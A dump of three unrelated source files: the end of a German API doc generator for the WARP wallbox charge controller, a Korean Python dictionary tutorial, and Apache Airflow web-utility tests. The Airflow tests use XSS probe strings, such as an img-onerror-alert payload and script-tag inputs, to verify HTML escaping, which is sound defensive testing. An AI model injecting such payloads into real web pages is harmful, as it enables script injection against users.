\"Fehler-Blinken 1 bis 10.\"),\n ]),\n \"duration\": Elem.INT(\"Dauer für die der gesetzte Zustand erhalten bleibt.\", unit=Units.ms)\n })\n ),\n\n Func(\"low_level_state\", FuncType.STATE, Elem.OBJECT(\"Der Low-Level-Zustand des Ladecontrollers.\", members={\n \"led_state\": Elem.INT(\"Der Zustand der am Ladecontroller angeschlossenen LED\", constants=[\n Const(0, \"Aus\"),\n Const(1, \"An\"),\n Const(2, \"Blinkt\"),\n Const(3, \"Flackert\"),\n Const(4, \"Atmet\"),\n Const(5, \"API, siehe {{{ref:evse/indicator_led}}}\"),\n ]),\n \"cp_pwm_duty_cycle\": Elem.INT(\"Tastverhältnis der Pulsweitenmodulation auf dem CP-Signal.\", unit=Units.tenth_percent),\n \"adc_values\": Elem.ARRAY(\"16-Bit ADC-Rohwerte der Spannungsmessungen\", members=[\n Elem.INT(\"CP/PE\", version=Version.WARP1),\n Elem.INT(\"PP/PE\", version=Version.WARP1),\n\n Elem.INT(\"CP/PE vor Widerstand (PWM High)\", version=Version.WARP2),\n Elem.INT(\"CP/PE nach Widerstand (PWM High)\", version=Version.WARP2),\n Elem.INT(\"CP/PE vor Widerstand (PWM Low)\", version=Version.WARP2),\n Elem.INT(\"CP/PE nach Widerstand (PWM Low)\", version=Version.WARP2),\n Elem.INT(\"PP/PE\", version=Version.WARP2),\n Elem.INT(\"+12V Rail\", version=Version.WARP2),\n Elem.INT(\"-12V Rail\", version=Version.WARP2),\n ]),\n \"voltages\": Elem.ARRAY(\"Aus den ADC-Werten berechnete Spannungen\", unit=Units.mV, members=[\n Elem.INT(\"CP/PE\", version=Version.WARP1),\n Elem.INT(\"PP/PE\", version=Version.WARP1),\n Elem.INT(\"Maximalspannung CP/PE\", version=Version.WARP1),\n\n Elem.INT(\"CP/PE vor Widerstand (PWM High)\", version=Version.WARP2),\n Elem.INT(\"CP/PE nach Widerstand (PWM High)\", version=Version.WARP2),\n Elem.INT(\"CP/PE vor Widerstand (PWM Low)\", version=Version.WARP2),\n Elem.INT(\"CP/PE nach Widerstand (PWM Low)\", version=Version.WARP2),\n Elem.INT(\"PP/PE\", version=Version.WARP2),\n Elem.INT(\"+12V Rail\", version=Version.WARP2),\n Elem.INT(\"-12V Rail\", version=Version.WARP2),\n ]),\n \"resistances\": Elem.ARRAY(\"Aus den Spannungen berechnete Widerstände\", unit=Units.ohm, members=[\n Elem.INT(\"CP/PE\"),\n Elem.INT(\"PP/PE\"),\n ]),\n \"gpio\": Elem.ARRAY(\"Signale auf den GPIOs\", members=[\n Elem.BOOL(\"Eingang\", version=Version.WARP1),\n Elem.BOOL(\"Ausgang\", version=Version.WARP1),\n Elem.BOOL(\"Motoreingangsschalter\", version=Version.WARP1),\n Elem.BOOL(\"Relais\", version=Version.WARP1),\n Elem.BOOL(\"Motorfehler\", version=Version.WARP1),\n\n Elem.BOOL(\"Stromkonfiguration 0\", version=Version.WARP2),\n Elem.BOOL(\"Motorfehler\", version=Version.WARP2),\n Elem.BOOL(\"Gleichstromfehler\", version=Version.WARP2),\n Elem.BOOL(\"Stromkonfiguration 1\", version=Version.WARP2),\n Elem.BOOL(\"DC-Fehlerstromschutz-Test\", version=Version.WARP2),\n Elem.BOOL(\"Abschaltung\", version=Version.WARP2),\n Elem.BOOL(\"Taster\", version=Version.WARP2),\n Elem.BOOL(\"CP-PWM\", version=Version.WARP2),\n Elem.BOOL(\"Motoreingangsschalter\", version=Version.WARP2),\n Elem.BOOL(\"Schützsteuerung\", version=Version.WARP2),\n Elem.BOOL(\"Konfigurierbarer Ausgang\", version=Version.WARP2),\n Elem.BOOL(\"CP-Trennung\", version=Version.WARP2),\n Elem.BOOL(\"Motor aktiv\", version=Version.WARP2),\n Elem.BOOL(\"Motor-Phase\", version=Version.WARP2),\n Elem.BOOL(\"Schützprüfung vorher\", version=Version.WARP2),\n Elem.BOOL(\"Schützprüfung nachher\", version=Version.WARP2),\n Elem.BOOL(\"Konfigurierbarer Eingang\", version=Version.WARP2),\n Elem.BOOL(\"DC X6\", version=Version.WARP2),\n Elem.BOOL(\"DC X30\", version=Version.WARP2),\n Elem.BOOL(\"LED\", version=Version.WARP2),\n Elem.BOOL(\"Nicht belegt\", version=Version.WARP2),\n Elem.BOOL(\"Nicht belegt\", version=Version.WARP2),\n Elem.BOOL(\"Nicht belegt\", version=Version.WARP2),\n Elem.BOOL(\"Nicht belegt\", version=Version.WARP2),\n ]),\n \"charging_time\": Elem.INT(\"Ungefähre Zeit des Ladevorgangs. Nur für Lastmanagementzwecke zu verwenden!\", unit=Units.ms),\n \"time_since_state_change\": Elem.INT(\"Zeit seit dem letzten IEC-61851-Zustandswechsel. Falls der Zustand 2 (= B: Lädt) ist, entspricht dieser Wert der Ladezeit.

Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms),\n \"uptime\": Elem.INT(\"Zeit seit Starten des Ladecontrollers.

Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms),\n \"time_since_dc_fault_check\": Elem.INT(\"Zeit seit dem letzten Test des DC-Fehlerstrom-Schutzmoduls. Achtung: Diese Zeit wird direkt über den Takt des Prozessors gemessen. Die Genauigkeit ist damit nur ausreichend für Zeitmessungen im Bereich Minuten bis wenige Stunden. Die Zeitmessung läuft nach ungefähr 50 Tagen über und beginnt wieder bei 0.\", unit=Units.ms, version=Version.WARP2),\n })\n ),\n\n Func(\"external_current\", FuncType.STATE, Elem.OBJECT(\"Der von der externen Steuerung vorgegebene Ladestrom. Kann über evse/external_current_update mit dem selben Payload gesetzt werden.\", members={\n \"current\": Elem.INT(\"Der von der externen Steuerung vorgegebene Ladestrom. 6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA)\n })\n ),\n\n Func(\"external_clear_on_disconnect\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der von der externen Ladesteuerung vorgegebene Ladestrom beim Abziehen eines Fahrzeugs automatisch auf 0 gesetzt werden soll. Kann über evse/external_clear_on_disconnect_update mit dem selben Payload gesetzt werden.\", members={\n \"clear_on_disconnect\": Elem.BOOL(\"Gibt an, ob der Ladestrom dieses Slots beim Abziehen eines Fahrzeugs auf 0 gesetzt wird.\", constants=[\n Const(True, \"Slot wird beim Abziehen blockieren\"),\n Const(False, \"Slot wird gesetzten Ladestrom beim Abziehen beibehalten\"),\n ])\n })\n ),\n\n Func(\"management_current\", FuncType.STATE, Elem.OBJECT(\"Der vom Lastmanagement vorgegebene Ladestrom. Kann über evse/management_current_update mit dem selben Payload gesetzt werden.\", members={\n \"current\": Elem.INT(\"6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockieren soll.\", unit=Units.mA)\n })\n ),\n\n Func(\"auto_start_charging\", FuncType.STATE, Elem.OBJECT(\"Konfiguriert, ob ein angeschlossenes Fahrzeug selbstständig geladen wird. Dieser Wert kann über evse/auto_start_charging_update mit dem selben Payload aktualisiert werden.\", members={\n \"auto_start_charging\": Elem.BOOL(\"Konfiguriert, ob ein angeschlossenes Fahrzeug selbstständig geladen wird. Falls aktiviert, beginnt sofort, wenn das Fahrzeug angeschlossen wird der Ladevorgang. Falls deaktiviert, kann das Laden mit {{{ref:evse/start_charging}}} gestartet werden.\"),\n })\n ),\n\n Func(\"global_current\", FuncType.STATE, Elem.OBJECT(\"Der über das Webinterface vorgegebene Ladestrom. Kann über evse/global_current_update mit dem selben Payload gesetzt werden.\", members={\n \"current\": Elem.INT(\"Der über das Webinterface vorgegebene Ladestrom. 6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA)\n })\n ),\n\n Func(\"management_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der Ladeslot des Lastmanagements aktiv ist. Der Wert kann über evse/management_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn Lastmanagement aktiviert ist, sonst false\")\n })\n ),\n\n Func(\"user_current\", FuncType.STATE, Elem.OBJECT(\"Der von der Benutzerautorisierung erlaubte Ladestrom.\", members={\n \"current\": Elem.INT(\"Der von der Benutzerautorisierung erlaubte Ladestrom. 6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA)\n })\n ),\n\n Func(\"user_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der Ladeslot der Benutzerautorisierung aktiv ist. Der Wert kann über evse/user_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn die Benutzerautorisierung aktiviert ist, sonst false\")\n })\n ),\n\n Func(\"external_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der Ladeslot der externen Steuerung aktiv ist. Der Wert kann über evse/external_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn die externe Steuerung aktiviert ist, sonst false\")\n })\n ),\n\n Func(\"external_defaults\", FuncType.STATE, Elem.OBJECT(\"Die nach einem Neustart des Ladecontrollers übernommenen Einstellungen des Ladeslots der externen Steuerung. Der Wert kann über evse/external_defaults_update mit dem selben Payload aktualisiert werden.\", members={\n \"current\": Elem.INT(\"Der nach einem Neustart übernommene Maximalstrom im Ladeslot der externen Steuerung. 6000 (=6 Ampere) bis 32000 (=32 Ampere) oder 0 falls der Slot blockiert.\", unit=Units.mA),\n \"clear_on_disconnect\": Elem.BOOL(\"Gibt an, ob der Ladestrom dieses Slots beim Abziehen eines Fahrzeugs auf 0 gesetzt wird.\", constants=[\n Const(True, \"Slot wird beim Abziehen blockieren\"),\n Const(False, \"Slot wird gesetzten Ladestrom beim Abziehen beibehalten\"),\n ]),\n })\n ),\n\n Func(\"modbus_tcp_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob die Ladeslots für Modbus-TCP aktiv sind (und damit ob Modbus-TCP Schreibzugriff gewährt wurde). Der Wert kann über evse/modbus_tcp_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn die Ladeslots für Modbus-TCP aktiviert sind, sonst false\")\n })\n ),\n\n Func(\"ocpp_enabled\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob der Ladeslot für OCPP aktiv ist. Der Wert kann über evse/ocpp_enabled_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true wenn OCPP aktiviert ist, sonst false\")\n })\n ),\n\n Func(\"gpio_configuration\", FuncType.STATE, Elem.OBJECT(\"Die Konfiguration der konfigurierbaren Ein- und Ausgänge. Kann über evse/gpio_configuration_update mit dem selben Payload aktualisiert werden.\", members={\n \"shutdown_input\": Elem.INT(\"Die Konfiguration des Abschalteingangs.\", constants=[\n Const(0, \"Nicht konfiguriert\"),\n Const(1, \"Abschalten wenn geöffnet\"),\n Const(2, \"Abschalten wenn geschlossen\"),\n ]),\n \"input\": Elem.INT(\"Die Konfiguration des konfigurierbaren Eingangs.\", constants=[\n Const(0, \"Nicht konfiguriert\"),\n Const(1, \"Blockiert wenn geschlossen\"),\n Const(2, \"Limitiert auf 6 A wenn geschlossen\"),\n Const(3, \"Limitiert auf 8 A wenn geschlossen\"),\n Const(4, \"Limitiert auf 10 A wenn geschlossen\"),\n Const(5, \"Limitiert auf 13 A wenn geschlossen\"),\n Const(6, \"Limitiert auf 16 A wenn geschlossen\"),\n Const(7, \"Limitiert auf 20 A wenn geschlossen\"),\n Const(8, \"Limitiert auf 25 A wenn geschlossen\"),\n Const(9, \"Blockiert wenn geöffnet\"),\n Const(10, \"Limitiert auf 6 A wenn geöffnet\"),\n Const(11, \"Limitiert auf 8 A wenn geöffnet\"),\n Const(12, \"Limitiert auf 10 A wenn geöffnet\"),\n Const(13, \"Limitiert auf 13 A wenn geöffnet\"),\n Const(14, \"Limitiert auf 16 A wenn geöffnet\"),\n Const(15, \"Limitiert auf 20 A wenn geöffnet\"),\n Const(16, \"Limitiert auf 25 A wenn geöffnet\"),\n ]),\n \"output\": Elem.INT(\"Die Konfiguration des konfigurierbaren Ausgangs.\", constants=[\n Const(0, \"Verbunden mit Masse\"),\n Const(1, \"Hochohmig\"),\n ]),\n },\n version=Version.WARP2)\n ),\n\n Func(\"button_configuration\", FuncType.STATE, Elem.OBJECT(\"Die Konfiguration des Tasters in der Frontblende. Diese kann über evse/button_configuration_update mit dem selben Payload aktualisiert werden. Benötigt das Feature \\\"button_configuration\\\"\", members={\n \"button\": Elem.INT(\"Die Konfiguration des Tasters in der Frontblende.\", constants=[\n Const(0, \"Deaktiviert\"),\n Const(1, \"Ladestart wenn gedrückt\"),\n Const(2, \"Ladestop wenn gedrückt\"),\n Const(3, \"Ladestart/stop wenn gedrückt\"),\n ]),\n },\n version=Version.WARP2)\n ),\n\n Func(\"led_configuration\", FuncType.STATE, Elem.OBJECT(\"Die Konfiguration der LED des Tasters in der Frontblende. Diese kann über evse/led_configuration_update mit dem selben Payload aktualisiert werden.\", members={\n \"enable_api\": Elem.BOOL(\"Legt fest, ob die LED über die {{{ref:evse/indicator_led_update}}}-API oder über Modbus TCP gesteuert werden darf.\", constants=[\n Const(False, \"LED darf nicht gesteuert werden. Aufrufe von {{{ref:evse/indicator_led_update}}} werden ignoriert\"),\n Const(True, \"LED darf gesteuert werden. Aufrufe von {{{ref:evse/indicator_led_update}}} werden nur dann ignoriert, wenn das EVSE einen Fehlerzustand anzeigen möchte.\")\n ]),\n })\n ),\n\n Func(\"user_calibration\", FuncType.STATE, Elem.OBJECT(\"Erlaubt es, die werksseitige Kalibrierung des EVSEs auszulesen und zu überschreiben. Dieser Wert kann über evse/user_calibration_update mit dem selben Payload aktualisiert werden. Um die Kalibierung auf den Werkszustand zurückzusetzen, kann ein Payload mit user_calibration_active auf false geschickt werden. Die weiteren Werte werden dann ignoriert.\", members={\n \"user_calibration_active\": Elem.BOOL(\"Gibt an, ob die werksseitige Kalibrierung überschrieben wurde.\"),\n \"voltage_diff\": Elem.INT(\"Einer der Kalibrierungsparameter.\"),\n \"voltage_mul\": Elem.INT(\"Einer der Kalibrierungsparameter.\"),\n \"voltage_div\": Elem.INT(\"Einer der Kalibrierungsparameter.\"),\n \"resistance_2700\": Elem.INT(\"Einer der Kalibrierungsparameter.\"),\n \"resistance_880\": Elem.ARRAY(\"Einer der Kalibrierungsparameter.\", member_type=EType.INT),\n },\n version=Version.WARP1)\n ),\n\n Func(\"ev_wakeup\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob das EVSE automatisch versucht die Ladeelektronik des Fahrzeugs aus einem Energiesparmodus zu wecken, indem ein Abziehen und Anstecken des Ladekabels vorgetäuscht wird. (Control-Pilot-Trennung/CP-Trennung) Dieser Wert kann über evse/ev_wakeup_update mit dem selben Payload aktualisiert werden. Benötigt das Feature \\\"cp_disconnect\\\"\", version=Version.WARP2, members={\n \"enabled\": Elem.BOOL(\"true wenn die Ladeelektronik des Fahrzeugs geweckt werden soll\")\n })\n ),\n\n Func(\"control_pilot_disconnect\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob ein Abziehen und Anstecken des Ladekabels vorgetäuscht ist. (Control-Pilot-Trennung/CP-Trennung) Dieser Wert kann über evse/control_pilot_disconnect_update mit dem selben Payload aktualisiert werden. Aktualisierungen werden ignoriert, falls das Lastmanagement aktiviert ist. Siehe {{{ref:evse/management_enabled}}}. Benötigt das Feature \\\"cp_disconnect\\\"\", version=Version.WARP2, members={\n \"disconnect\": Elem.BOOL(\"true CP getrennt ist, sonst false\")\n })\n ),\n\n Func(\"boost_mode\", FuncType.STATE, Elem.OBJECT(\"Gibt an, ob das EVSE der Ladeelektronik des Fahrzeugs einen leicht höheren Ladestrom vorgibt (+ 0,24 A) um Messfehler der Ladeelektronik zu kompensieren. Nur Verwenden, falls ein Fahrzeug mit einem kleineren als dem erlaubten Ladestrom lädt! Dieser Wert kann über evse/boost_mode_update mit dem selben Payload aktualisiert werden.\", members={\n \"enabled\": Elem.BOOL(\"true CP getrennt ist, sonst false\")\n })\n ),\n\n Func(\"reset_dc_fault_current_state\", FuncType.COMMAND, Elem.OBJECT(\"Setzt das DC-Fehlerstrom-Schutzmodul zurück. Vor dem Zurücksetzen muss der Grund des Fehlers unbedingt behoben werden!\", version=Version.WARP2, members={\n \"password\": Elem.INT(\"Passwort, das zum Zurücksetzen benötigt wird. Das Passwort lautet 0xDC42FA23.\")\n })\n ),\n\n Func(\"trigger_dc_fault_test\", FuncType.COMMAND, Elem.NULL(\"Startet einen Test des DC-Fehlerstrom-Schutzmoduls.\", version=Version.WARP2)),\n\n Func(\"gp_output\", FuncType.STATE, Elem.OBJECT(\"Der aktuelle Wert des konfigurierbaren Ausgangs. Dieser Wert kann über evse/gp_output_update mit dem selben Payload aktualisiert werden.\", version=Version.WARP2, members={\n \"gp_output\": Elem.INT(\"Der aktuelle Wert des konfigurierbaren Ausgangs.\", constants=[\n Const(0, \"Verbunden mit Masse\"),\n Const(1, \"Hochohmig\"),\n ]),\n })\n ),\n\n Func(\"stop_charging\", FuncType.COMMAND, Elem.NULL(\"Beendet den laufenden Ladevorgang. Ein Aufruf dieser Funktion ist äquivalent zum Stoppen über den Taster an der Wallbox: Es wird TODO LINK Slot 4 blockiert. Ein Ladevorgang kann mit {{{ref:evse/start_charging}}} wieder gestartet werden.\"), command_is_action=True),\n\n Func(\"start_charging\", FuncType.COMMAND, Elem.NULL(\"Startet einen Ladevorgang. Ein Aufruf dieser Funktion ist äquivalent zum Starten über den Taster an der Wallbox: Es wird TODO LINK Slot 4 freigegeben. Ein Ladevorgang kann mit {{{ref:evse/stop_charging}}} wieder gestoppt werden.\"), command_is_action=True),\n\n Func(\"start_debug\", FuncType.HTTP_ONLY, Elem.OPAQUE(\"Startet ein Ladeprotokoll. Es werden hochfrequent Messwerte des Ladecontrollers auf die WebSockets geschrieben, bis {{{ref:evse/stop_debug}}} aufgerufen wird.\")),\n Func(\"stop_debug\", FuncType.HTTP_ONLY, Elem.OPAQUE(\"Stoppt ein Ladeprotokoll. Siehe {{{ref:evse/start_debug}}} für Details.\"))\n])\n","repo_name":"Tinkerforge/warp-charger","sub_path":"api_doc_generator/evse.py","file_name":"evse.py","file_ext":"py","file_size_in_byte":28320,"program_lang":"python","lang":"de","doc_type":"code","stars":46,"dataset":"github-code","pt":"35"} +{"seq_id":"37197514448","text":"#1. 딕셔너리 만들기\n\nlunch = {\n '중국집':'02'\n}\n\n\"\"\"\n2. 딕셔너리 내용 추가하기\n#함수로 dictionary 만드는 방법 \n# 처음 중국집에 ''붙이면안됩니다.\n\"\"\"\n\nlunch = dict(중국집='02')\n#print(lunch)\n\n#dictionary에 저장하고시프세여?\nlunch['분식집'] = '031'\n# print(lunch)\n\n#딕셔너리의 내용을 가져와보겠읍니다.\n\"\"\"\n3. 딕셔너리 값 가져오기\n\"\"\"\nidol = {\n 'bts': {\n '지민':24,\n 'RM':25\n }\n}\n\n# print(idol['bts']['RM'])\n# #key로 value를 가지고 올 수 있음 (1)\n\n# print(idol.get('bts').get('RM'))\n# #key로 value를 가지고 올 수 있음 (2)\n\n\"\"\"\n4. 딕셔너리 반복문 활용하기\n\"\"\"\n#4-1 기본활용\n\n# for key in lunch:\n# print(key)\n# print(lunch[key])\n\n#4-2 .items() - key, value 모두 가져오기\n# for key, value in lunch.items():\n# print(key, value)\n\n#4-3 .values() - value만 가져오기\n# for value in lunch.values():\n# print(value)\n\n#4-4 .keys() - key만 가져오기\nfor key in lunch.keys():\n print(key)","repo_name":"nsk324/TIL","sub_path":"00_StartCamp/04_Day/00_dict.py","file_name":"00_dict.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"32690042843","text":"from __future__ import annotations\n\nimport itertools\nimport re\nfrom datetime import datetime\nfrom unittest.mock import Mock\nfrom urllib.parse import parse_qs\n\nimport pendulum\nfrom bs4 import BeautifulSoup\nfrom markupsafe import Markup\n\nfrom airflow.models import DagRun\nfrom airflow.utils import json as utils_json\nfrom airflow.www import utils\nfrom airflow.www.utils import DagRunCustomSQLAInterface, json_f, wrapped_markdown\n\n\nclass TestUtils:\n def check_generate_pages_html(\n self,\n current_page,\n total_pages,\n window=7,\n check_middle=False,\n sorting_key=None,\n sorting_direction=None,\n ):\n extra_links = 4 # first, prev, next, last\n search = \"'>\\\"/>\"\n if sorting_key and sorting_direction:\n html_str = utils.generate_pages(\n current_page,\n total_pages,\n search=search,\n sorting_key=sorting_key,\n sorting_direction=sorting_direction,\n )\n else:\n html_str = utils.generate_pages(current_page, total_pages, search=search)\n\n assert search not in html_str, \"The raw search string shouldn't appear in the output\"\n assert \"search=%27%3E%22%2F%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E\" in html_str\n\n assert callable(html_str.__html__), \"Should return something that is HTML-escaping aware\"\n\n dom = BeautifulSoup(html_str, \"html.parser\")\n assert dom is not None\n\n ulist = dom.ul\n ulist_items = ulist.find_all(\"li\")\n assert min(window, total_pages) + extra_links == len(ulist_items)\n\n page_items = ulist_items[2:-2]\n mid = len(page_items) // 2\n all_nodes = []\n pages = []\n\n if sorting_key and sorting_direction:\n last_page = total_pages - 1\n\n if current_page <= mid or total_pages < window:\n pages = list(range(min(total_pages, window)))\n elif mid < current_page < last_page - mid:\n pages = list(range(current_page - mid, current_page + mid + 1))\n else:\n pages = list(range(total_pages - window, last_page + 1))\n\n pages.append(last_page + 1)\n pages.sort(reverse=True if sorting_direction == \"desc\" else False)\n\n for i, item in enumerate(page_items):\n a_node = item.a\n href_link = a_node[\"href\"]\n node_text = a_node.string\n all_nodes.append(node_text)\n if node_text == str(current_page + 1):\n if check_middle:\n assert mid == i\n assert \"javascript:void(0)\" == href_link\n assert \"active\" in item[\"class\"]\n else:\n assert re.search(r\"^\\?\", href_link), \"Link is page-relative\"\n query = parse_qs(href_link[1:])\n assert query[\"page\"] == [str(int(node_text) - 1)]\n assert query[\"search\"] == [search]\n\n if sorting_key and sorting_direction:\n if pages[0] == 0:\n pages = [str(page) for page in pages[1:]]\n\n assert pages == all_nodes\n\n def test_generate_pager_current_start(self):\n self.check_generate_pages_html(current_page=0, total_pages=6)\n\n def test_generate_pager_current_middle(self):\n self.check_generate_pages_html(current_page=10, total_pages=20, check_middle=True)\n\n def test_generate_pager_current_end(self):\n self.check_generate_pages_html(current_page=38, total_pages=39)\n\n def test_generate_pager_current_start_with_sorting(self):\n self.check_generate_pages_html(\n current_page=0, total_pages=4, sorting_key=\"dag_id\", sorting_direction=\"asc\"\n )\n\n def test_params_no_values(self):\n \"\"\"Should return an empty string if no params are passed\"\"\"\n assert \"\" == utils.get_params()\n\n def test_params_search(self):\n assert \"search=bash_\" == utils.get_params(search=\"bash_\")\n\n def test_params_none_and_zero(self):\n query_str = utils.get_params(a=0, b=None, c=\"true\")\n # The order won't be consistent, but that doesn't affect behaviour of a browser\n pairs = sorted(query_str.split(\"&\"))\n assert [\"a=0\", \"c=true\"] == pairs\n\n def test_params_all(self):\n query = utils.get_params(tags=[\"tag1\", \"tag2\"], status=\"active\", page=3, search=\"bash_\")\n assert {\n \"tags\": [\"tag1\", \"tag2\"],\n \"page\": [\"3\"],\n \"search\": [\"bash_\"],\n \"status\": [\"active\"],\n } == parse_qs(query)\n\n def test_params_escape(self):\n assert \"search=%27%3E%22%2F%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E\" == utils.get_params(\n search=\"'>\\\"/>\"\n )\n\n def test_state_token(self):\n # It's shouldn't possible to set these odd values anymore, but lets\n # ensure they are escaped!\n html = str(utils.state_token(\"\"))\n\n assert \"<script>alert(1)</script>\" in html\n assert \"\" not in html\n\n def test_task_instance_link(self):\n from airflow.www.app import cached_app\n\n with cached_app(testing=True).test_request_context():\n html = str(\n utils.task_instance_link(\n {\"dag_id\": \"\", \"task_id\": \"\", \"execution_date\": datetime.now()}\n )\n )\n\n assert \"%3Ca%261%3E\" in html\n assert \"%3Cb2%3E\" in html\n assert \"\" not in html\n assert \"\" not in html\n\n def test_dag_link(self):\n from airflow.www.app import cached_app\n\n with cached_app(testing=True).test_request_context():\n html = str(utils.dag_link({\"dag_id\": \"\", \"execution_date\": datetime.now()}))\n\n assert \"%3Ca%261%3E\" in html\n assert \"\" not in html\n\n def test_dag_link_when_dag_is_none(self):\n \"\"\"Test that when there is no dag_id, dag_link does not contain hyperlink\"\"\"\n from airflow.www.app import cached_app\n\n with cached_app(testing=True).test_request_context():\n html = str(utils.dag_link({}))\n\n assert \"None\" in html\n assert \"\", \"run_id\": \"\", \"execution_date\": datetime.now()})\n )\n\n assert \"%3Ca%261%3E\" in html\n assert \"%3Cb2%3E\" in html\n assert \"\" not in html\n assert \"\" not in html\n\n\nclass TestAttrRenderer:\n def setup_method(self):\n self.attr_renderer = utils.get_attr_renderer()\n\n def test_python_callable(self):\n def example_callable(unused_self):\n print(\"example\")\n\n rendered = self.attr_renderer[\"python_callable\"](example_callable)\n assert \""example"\" in rendered\n\n def test_python_callable_none(self):\n rendered = self.attr_renderer[\"python_callable\"](None)\n assert \"\" == rendered\n\n def test_markdown(self):\n markdown = \"* foo\\n* bar\"\n rendered = self.attr_renderer[\"doc_md\"](markdown)\n assert \"
  • foo
  • \" in rendered\n assert \"
  • bar
  • \" in rendered\n\n def test_markdown_none(self):\n rendered = self.attr_renderer[\"doc_md\"](None)\n assert rendered is None\n\n def test_get_dag_run_conf(self):\n dag_run_conf = {\n \"1\": \"string\",\n \"2\": b\"bytes\",\n \"3\": 123,\n \"4\": \"à\".encode(\"latin\"),\n \"5\": datetime(2023, 1, 1),\n }\n expected_encoded_dag_run_conf = (\n '{\"1\": \"string\", \"2\": \"bytes\", \"3\": 123, \"4\": \"à\", \"5\": \"2023-01-01T00:00:00+00:00\"}'\n )\n encoded_dag_run_conf, conf_is_json = utils.get_dag_run_conf(\n dag_run_conf, json_encoder=utils_json.WebEncoder\n )\n assert expected_encoded_dag_run_conf == encoded_dag_run_conf\n\n def test_json_f_webencoder(self):\n dag_run_conf = {\n \"1\": \"string\",\n \"2\": b\"bytes\",\n \"3\": 123,\n \"4\": \"à\".encode(\"latin\"),\n \"5\": datetime(2023, 1, 1),\n }\n expected_encoded_dag_run_conf = (\n # HTML sanitization is insane\n '{\"1\": \"string\", \"2\": \"bytes\", \"3\": 123, \"4\": \"\\\\u00e0\", \"5\": \"2023-01-01T00:00:00+00:00\"}'\n )\n expected_markup = Markup(\"{}\").format(expected_encoded_dag_run_conf)\n\n formatter = json_f(\"conf\")\n dagrun = Mock()\n dagrun.get = Mock(return_value=dag_run_conf)\n\n assert formatter(dagrun) == expected_markup\n\n\nclass TestWrappedMarkdown:\n def test_wrapped_markdown_with_docstring_curly_braces(self):\n rendered = wrapped_markdown(\"{braces}\", css_class=\"a_class\")\n assert (\n \"\"\"

    {braces}

    \n
    \"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_some_markdown(self):\n rendered = wrapped_markdown(\n \"\"\"*italic*\n **bold**\n \"\"\",\n css_class=\"a_class\",\n )\n\n assert (\n \"\"\"

    italic\nbold

    \n
    \"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_table(self):\n rendered = wrapped_markdown(\n \"\"\"\n| Job | Duration |\n| ----------- | ----------- |\n| ETL | 14m |\n\"\"\"\n )\n\n assert (\n \"\"\"
    \n\n\n\n\n\n\n\n\n\n\n\n\n
    JobDuration
    ETL14m
    \n
    \"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_indented_lines(self):\n rendered = wrapped_markdown(\n \"\"\"\n # header\n 1st line\n 2nd line\n \"\"\"\n )\n\n assert (\n \"\"\"

    header

    \\n

    1st line\\n2nd line

    \n
    \"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_raw_code_block(self):\n rendered = wrapped_markdown(\n \"\"\"\\\n # Markdown code block\n\n Inline `code` works well.\n\n Code block\n does not\n respect\n newlines\n\n \"\"\"\n )\n\n assert (\n \"\"\"

    Markdown code block

    \n

    Inline code works well.

    \n
    Code block\\ndoes not\\nrespect\\nnewlines\\n
    \n
    \"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_nested_list(self):\n rendered = wrapped_markdown(\n \"\"\"\n ### Docstring with a code block\n\n - And\n - A nested list\n \"\"\"\n )\n\n assert (\n \"\"\"

    Docstring with a code block

    \n
      \n
    • And\n
        \n
      • A nested list
      • \n
      \n
    • \n
    \n
    \"\"\"\n == rendered\n )\n\n def test_wrapped_markdown_with_collapsible_section(self):\n rendered = wrapped_markdown(\n \"\"\"\n# A collapsible section with markdown\n
    \n Click to expand!\n\n ## Heading\n 1. A numbered\n 2. list\n * With some\n * Sub bullets\n
    \n \"\"\"\n )\n\n assert (\n \"\"\"

    A collapsible section with markdown

    \n
    \n Click to expand!\n

    Heading

    \n
      \n
    1. A numbered
    2. \n
    3. list\n
        \n
      • With some
      • \n
      • Sub bullets
      • \n
      \n
    4. \n
    \n
    \n
